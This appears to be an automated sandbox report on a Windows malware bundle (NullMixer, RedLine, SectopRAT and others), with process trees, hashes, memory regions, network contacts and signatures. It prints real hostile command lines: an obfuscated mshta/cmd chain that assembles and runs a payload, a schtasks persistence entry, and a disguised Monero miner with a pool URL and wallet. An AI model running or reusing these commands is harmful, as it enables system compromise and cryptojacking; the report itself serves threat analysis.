"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5048 -ip 5048

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 1016

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" EcHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y ..\lXQ2g.WC

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Roaming\services64.exe

C:\Users\Admin\AppData\Roaming\services64.exe

C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe

"C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2944 -ip 2944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 780

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.raw/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CFvMg9MgC241sftmft2lYvgrdUwd08ilNkQ/lCe6+NW" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

Network

Country Destination Domain Proto

Files


MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\nsu9E36.tmp\INetC.dll

MD5 2b342079303895c50af8040a91f30f71
SHA1 b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA256 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

C:\Users\Admin\AppData\Local\Temp\Chrome4.exe

MD5 89d1bd67214042bde02749afdc91b85f
SHA1 bd3b9b45fecb02a8d38a3f2dab7de14a3e4f8ea4
SHA256 4672ca322e9d03b30223452f9d9be6e78d957ef47fc046fc60a1fffc1edad1e0
SHA512 bacf183ae91cd2f8521f5ff376a2f004b2222738b5ffe2c69d623b33266186ccc7036fb255591af1d3b7f1003376950486e42cb1dc202a60ffd597a7227a15ad

C:\Users\Admin\AppData\Local\Temp\nsu9E36.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

memory/5048-211-0x00000000031A0000-0x000000000321C000-memory.dmp

memory/2108-145-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4060-116-0x0000000000CE0000-0x0000000000CE8000-memory.dmp

memory/3028-81-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2956-59-0x00000000004E0000-0x000000000052A000-memory.dmp

memory/1200-55-0x0000000000010000-0x000000000005A000-memory.dmp

memory/1200-52-0x0000000000010000-0x000000000005A000-memory.dmp

memory/1200-48-0x0000000000010000-0x000000000005A000-memory.dmp

memory/2904-26-0x0000000002BC0000-0x0000000002BC6000-memory.dmp

memory/2904-15-0x0000000000B50000-0x0000000000B6A000-memory.dmp

memory/2904-13-0x00007FFC0EC13000-0x00007FFC0EC15000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 a301ebde2b21398e796398cd7c973296
SHA1 4e417ba63cde94f776843e1208013b537571e9a8
SHA256 602099bed23abfc1c5f2aea2592a2bc2a7d6c3e911b984e32c16dfc30db1a04f
SHA512 99b8696cc1f1f7a12706cc71fae6601ac64bca2f772e4ffac7972e3529204c75e1dd6f7537f35849ca6b6ec7813c8f633c03dd41fd20d1aa038dcbc17f27ddb4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 84b7af9d76223783b896008964b883ce
SHA1 d9d89432969372eb5fb7aba6c710de9c67f47245
SHA256 4c3dace7ea81bd11cf97b84357dcfb49533fbfc80f2f0cc3e617491e41722088
SHA512 cd26c958313b158fd146f9dcd79b1fe8aae0c7d2a8220373b35454fd8889e91d8425be98d6d470735996fae8c8848afa92027f86941e8faca1349eb97d317c01

C:\Users\Admin\AppData\Local\Temp\RarSFX1\WcWfz1Tn.MJ

MD5 e1caa9cc3b8bd60f12093059981f3679
SHA1 f35d8b851dc0222ae8294b28bd7dee339cc0589b
SHA256 254b6e6f43b2707ac107664b163ba074051b0534aafa8faf85a1760299182565
SHA512 23f3fa616c1a96acd9a781d833a69ac37a9989dc5605396ecde41beae971b287bc963ea8020c56d92034e7e284c37639280650e1674864707ba859ad5815cdfa

C:\Users\Admin\AppData\Local\Temp\RarSFX1\MyBa.V

MD5 51424c68f5ff16380b95f917c7b78703
SHA1 70aa922f08680c02918c765daf8d0469e5cd9e50
SHA256 065f5b48408abb0260d68775e6db36136c8ac2bd7c8a1168613cc5cb8825d315
SHA512 c7510a9555402d64665bcbce661eb54c1bcbb20095c084036d8af625de9d0bf93cb33e93cbc9b6efbc73f9080ef7052dcbc35fb8d44ccf56fb2db8af933e06af

C:\Users\Admin\AppData\Local\Temp\RarSFX1\1w8lBDVH.aou

MD5 112b8c9fa0419875f26ca7b592155f2b
SHA1 0b407062b6e843801282c2dc0c3749f697a67300
SHA256 95ae984c19dbf91919296efb398aaf700605910a28abe9288c7639c7d9223202
SHA512 a71e187dbc18c2d7cd21b1e856ee7d58e230b801758ed6a2205e8dacdc8235a09111014cff3171ea82e8942251508ada57eefdbcbc13daddbfbe30eddc29dad8

C:\Users\Admin\AppData\Local\Temp\RarSFX1\9Bu~.w

MD5 8b4e06aede42785b01c3cdf3f0883da6
SHA1 664fdc12cb0141ffd68b289eaaf70ae4c5163a5a
SHA256 8a8d67872f0bc6e6669f7396a84b879d12882ea495467b09b6613edfc4108c42
SHA512 7b6a20e41365c546f1aa5a84964b36fc4cedd194754d1f09cfdadf822f4141d037067811ca62a7d2da23ec1e332943cb828d4f771308fdfa79327cb3fb6f2c82

memory/5048-254-0x0000000000400000-0x0000000002F74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\hKS2IU.1Q

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/2008-261-0x0000000002AF0000-0x0000000003AF0000-memory.dmp

memory/1200-262-0x0000000000BB0000-0x0000000000BBC000-memory.dmp

memory/2008-263-0x000000002D8F0000-0x000000002D996000-memory.dmp

memory/2008-267-0x000000002D9A0000-0x000000002DA33000-memory.dmp

memory/2008-264-0x000000002D9A0000-0x000000002DA33000-memory.dmp

memory/2108-268-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3448-269-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2008-270-0x0000000002AF0000-0x0000000003AF0000-memory.dmp

memory/3660-278-0x000001CE77E60000-0x000001CE78080000-memory.dmp

memory/3660-279-0x000001CE7AA80000-0x000001CE7ACA0000-memory.dmp

memory/3660-280-0x000001CE79EE0000-0x000001CE79EF2000-memory.dmp

memory/2008-281-0x000000002D9A0000-0x000000002DA33000-memory.dmp

memory/2008-282-0x000000002DA40000-0x000000002E8A6000-memory.dmp

memory/2008-283-0x000000002E8B0000-0x000000002E93D000-memory.dmp

memory/2008-284-0x000000002E940000-0x000000002E9C8000-memory.dmp

memory/2008-285-0x000000002E940000-0x000000002E9C8000-memory.dmp

memory/2008-287-0x000000002E940000-0x000000002E9C8000-memory.dmp

memory/2008-288-0x0000000000A30000-0x0000000000A33000-memory.dmp

memory/2008-289-0x0000000000A40000-0x0000000000A45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe

MD5 a014b8961283f1e07d7f31ecdd7db62f
SHA1 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065
SHA256 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89
SHA512 bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869

memory/2944-321-0x0000000000F60000-0x0000000000F68000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

MD5 b245679121623b152bea5562c173ba11
SHA1 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA256 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA512 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 816520bddbb9cd95a5904ba5c6626989
SHA1 d6aca0489429c82eab0f5e213f1ca93648a36eb2
SHA256 8877b12798309300f6f18ac44e2c4770076c152b5ba36f17b8bf94338adc178a
SHA512 2db4fb133d24d8cd8905c42e8affab1efd322efa740ba8381de4a0f610a2492a78dfc42761d85d7df13334938da7ddd0fe95a6066ff3d40f03c2f71f2f5660c3

memory/4556-336-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4556-339-0x0000000002E20000-0x0000000002E40000-memory.dmp

memory/4556-338-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4556-341-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4556-340-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3468-357-0x000002579D180000-0x000002579D186000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06384ea2548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
